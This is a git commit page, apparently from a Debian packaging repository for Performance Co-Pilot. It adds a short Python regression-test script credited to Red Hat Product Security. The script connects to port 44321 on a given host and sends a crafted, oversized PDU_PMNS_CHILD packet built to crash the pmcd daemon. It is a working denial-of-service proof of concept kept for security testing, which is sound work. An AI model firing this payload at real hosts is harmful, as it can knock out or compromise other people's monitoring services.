Debian 3.9.10debian/3.9.10 debian

author: Igor Pashev <pashev.igor@gmail.com> 2014-10-26 12:33:50 +0400
committer: Igor Pashev <pashev.igor@gmail.com> 2014-10-26 12:33:50 +0400
commit: 47e6e7c84f008a53061e661f31ae96629bc694ef (patch)
tree: 648a07f3b5b9d67ce19b0fd72e8caa1175c98f1a /qa/secure/crash-namereq-child
download: pcp-debian.tar.gz
1 files changed, 19 insertions, 0 deletions
diff --git a/qa/secure/crash-namereq-child b/qa/secure/crash-namereq-child
new file mode 100755
index 0000000..9066626
--- /dev/null
+++ b/qa/secure/crash-namereq-child
@@ -0,0 +1,19 @@
+#
+# usage: python crash-namereq-child HOST
+#
+# Sends a crafted PDU_PMNS_CHILD PDU to HOST.
+#
+# Florian Weimer / Red Hat Product Security Team
+#
+import socket
+import sys
+_, host = sys.argv
+sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+sock.connect((host, 44321))
+sock.send(
+    str("\x00\x00\x00\x14\x00\x00p\x0c\x00\x00\x00\x01\x00\x00\x00\x01\x01\x02\x00\x00")
+    + str('\x00\x00\x10\x18\x00\x00') + str("\x70\x0f")	# PDU_PMNS_CHILD
+    + str('\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xffXXXX')
+    + str('X') * 0x1000)
+
+sock.close()
author	Igor Pashev <pashev.igor@gmail.com>	2014-10-26 12:33:50 +0400
committer	Igor Pashev <pashev.igor@gmail.com>	2014-10-26 12:33:50 +0400
commit	47e6e7c84f008a53061e661f31ae96629bc694ef (patch)
tree	648a07f3b5b9d67ce19b0fd72e8caa1175c98f1a /qa/secure/crash-namereq-child
download	pcp-debian.tar.gz